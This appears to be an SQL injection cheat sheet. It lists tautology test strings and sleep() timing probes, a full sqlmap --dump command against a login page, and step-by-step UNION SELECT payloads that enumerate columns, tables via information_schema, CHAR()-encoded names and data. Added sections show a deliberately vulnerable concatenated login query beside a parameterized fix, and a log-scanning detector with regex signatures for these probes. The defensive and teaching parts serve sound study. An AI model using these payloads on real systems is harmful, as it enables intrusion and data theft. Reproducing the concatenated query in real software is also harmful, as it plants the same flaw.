Test Strings
"
'or 1=1
"or 1=1
or 1=1--
'or 1=1--
"or 1=1--
or 1=1#
'or 1=1#
"or
1=1#
or 1=1/*
'or 1=1/*
"or 1=1/*
or 1=1;%00
'or 1=1;%00
"or 1=1;%00
'or'
'or
'or'--
'or--
or a=a
'or a=a
"or a=a
or a=a--
'or a=a--
"or a=a--
or 'a'='a'
'or 'a'='a'
"or 'a'='a'
')or('a'='a'
")”a”=”a”
')'a'='a
'or"='
1' or '1'='1
' or 'abc'='abc';--
' or ' '=' ';--
' or 1=1;--
If any of these let you create an always-true statement, or make the application return a database error, the input is vulnerable.
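To show why the always-true strings above work, here is an added example (not from the original cheat sheet) of a login check written two ways: with the user input concatenated into the SQL text, and with bound parameters. It uses Python's built-in sqlite3 as a stand-in for the MySQL target the page assumes; the `--` comment terminator behaves the same in both, while `#` is MySQL-only. The table, credentials and probe values are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation, so a quote in the input
    changes the SQL grammar instead of staying inside the string literal."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # A bare quote produces a syntax error; leaking this message to the
        # client is the "produce an error" signal the test strings look for.
        return "error", str(exc)
    return "ok", [r[0] for r in rows]


def login_parameterized(conn, username, password):
    """Same query with placeholders: the driver binds the values after the
    statement is parsed, so input can never become keywords or comments."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    rows = conn.execute(sql, (username, password)).fetchall()
    return "ok", [r[0] for r in rows]


def compare(username, password):
    """Run both implementations on the same input and return both results."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    for probe in ("'", "' or 1=1--", "admin"):
        print(repr(probe), compare(probe, "wrong-password"))
```

With the concatenated version, `' or 1=1--` in the username field turns the WHERE clause into `username='' or 1=1` followed by a comment, so the query returns every row and the caller sees a successful login; a lone `'` produces a parser error. The parameterized version treats both inputs as literal usernames that match nothing, which is the fix a defender wants to see in code review.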
Test via timing
sleep(10)
1' sleep(10) ;--
Exploit
The easy way out is if you can use sqlmap:
# Read help
sqlmap -h
# Example
sudo sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
Otherwise, hopefully you can see some output from the injection test... if so, the following steps get you to the W.
Find number of columns
Inject union select NULL,NULL,... adding one more NULL each time until there is no error. The number of NULLs when there is no error is the number of columns in the table.
Get Version or DBMS
Let n == Number of columns...
Inject union all select 1,2,n-1,@@version,n
Note: this may not be the vulnerable column! If this doesn't work and you get an error, it should disclose the vulnerable column. If not, guess and check.
Check database we're on
Inject union all select 1,2,n-1,database(),n
Note: this is DBMS dependent!
Get tables
Inject union select 1,2,n-1,group_concat(table_name),n from information_schema.tables where table_schema=database()
Getting columns
Any table/row name you inject needs to be converted to a CHAR() string; use waraxe's tool.
Inject union select 1,2,n-1,group_concat(column_name),n from information_schema.columns where table_name=CHAR(100,101,118,95,97,99,99,111,117,110,116,115)
Getting data
Inject union select 1,2,n-1,group_concat(<rowname>,0x3a,<another_row_name>),n from <table_name>
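Every step above, from the timing test through the union, information_schema and CHAR() queries, leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original cheat sheet, of detection logic that URL-decodes the request target of each log line and flags the probe families this page lists. The log lines and the `/item.php` and `/search.php` paths are constructed for the demonstration; the signature patterns are a starting point for a log search or WAF rule, not a complete one.

```python
import re
from urllib.parse import unquote_plus

# Signature families drawn from the probes listed on this page. Each is checked
# against the URL-decoded request target (query string or form body).
SIGNATURES = [
    # 'or 1=1, or a=a, ')or('a'='a  -> both sides of "=" are the same token
    ("tautology", re.compile(r"""(?i)\bor\s*\(?['"]?(\w+)['"]?\s*=\s*['"]?\1\b""")),
    # --, /*, # and ;%00 (decoded to a NUL byte) used to discard the rest of the query
    ("comment-terminator", re.compile(r"(--|/\*|#|;\x00)")),
    # column-count enumeration and data extraction
    ("union-select", re.compile(r"(?i)\bunion\s+(all\s+)?select\b")),
    # table / column discovery
    ("schema-read", re.compile(r"(?i)\binformation_schema\.(tables|columns)\b")),
    # CHAR(100,101,...) used to smuggle names past quote filtering
    ("char-encoding", re.compile(r"(?i)\bchar\(\s*\d+(\s*,\s*\d+)+\s*\)")),
    # sleep(10)-style timing tests
    ("timing", re.compile(r"(?i)\bsleep\(\s*\d+\s*\)")),
]

# Apache/nginx combined-format prefix: client, ident, user, [time] "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)')

# Constructed sample log (not real traffic). Lines 2-6 mimic the page's test
# strings and extraction steps; lines 1 and 7 are benign requests.
LOG_LINES = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /checklogin.php?myusername=admin&mypassword=test HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /checklogin.php?myusername=%27or+1%3D1--&mypassword=x HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /item.php?id=1+union+select+NULL,NULL,NULL HTTP/1.1" 500 230
10.0.0.9 - - [12/Mar/2024:10:01:15 +0000] "GET /item.php?id=1+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 980
10.0.0.9 - - [12/Mar/2024:10:01:18 +0000] "GET /item.php?id=1+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=CHAR(100,101,118) HTTP/1.1" 200 640
10.0.0.9 - - [12/Mar/2024:10:01:20 +0000] "GET /item.php?id=1%27+sleep(10)+;-- HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /search.php?q=oregon+or+washington HTTP/1.1" 200 2048
"""


def scan_request(raw):
    """Return the names of all signature families found in a URL-encoded
    request target or body, in SIGNATURES order (empty list if clean)."""
    decoded = unquote_plus(raw)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def scan_log(text):
    """Parse combined-format lines and return one hit record per request
    that matched at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        client, when, method, target, status, size = m.groups()
        found = scan_request(target)
        if found:
            hits.append({"client": client, "time": when, "status": int(status),
                         "target": target, "signatures": found})
    return hits


def hits_per_client(hits):
    """Aggregate hits by source address; a burst from one client across
    several families is the pattern a triage rule should alert on."""
    counts = {}
    for h in hits:
        counts[h["client"]] = counts.get(h["client"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(LOG_LINES)
    for h in found:
        print(h["client"], h["status"], h["signatures"], h["target"])
    print(hits_per_client(found))
```

The benign "oregon or washington" search does not trip the tautology rule because that rule requires the same token on both sides of an `=`; the 500 response on the NULL,NULL,NULL request is the error the enumeration step relies on, so pairing the signature match with the status code is a useful second signal when tuning alerts.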